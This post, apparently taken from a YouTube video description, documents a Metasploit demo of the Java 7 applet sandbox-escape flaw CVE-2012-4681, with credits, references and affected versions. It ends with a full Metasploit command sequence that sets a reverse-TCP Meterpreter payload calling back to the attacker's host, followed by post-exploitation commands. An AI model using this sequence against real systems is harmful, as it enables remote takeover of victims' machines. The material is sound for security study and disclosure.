Java 7 Applet RCE 0day Gondvv Linux Metasploit Demo

[Wubi]

Description:
Vulnerability found exploited in the wild and discovered by Michael Schierl
First details of the vulnerability the 2012-08-26
Source code of the vulnerability provided by jduck the 2012-08-26
Metasploit PoC provided the 2012-08-27

PoC provided by:
Unknown
jduck
sinn3r
juan vazquez

Reference(s) :
CVE-2012-4681
OSVDB-84867
BID-55213
Zero-Day Season is Not Over Yet
Java 7 0-Day vulnerability information and mitigation

Affected versions :
Oracle JSE (Java Standard Edition) version 1.7.0_06-b24 and previous.

Tested on Ubuntu 12.04 with :
Firefox & Oracle JSE 1.7.0_06-b24

Description :
This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms.

Metasploit demo :

use exploit/multi/browser/java_jre17_exec
set SRVHOST 192.168.178.100
set TARGET 2
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Sursa YouTube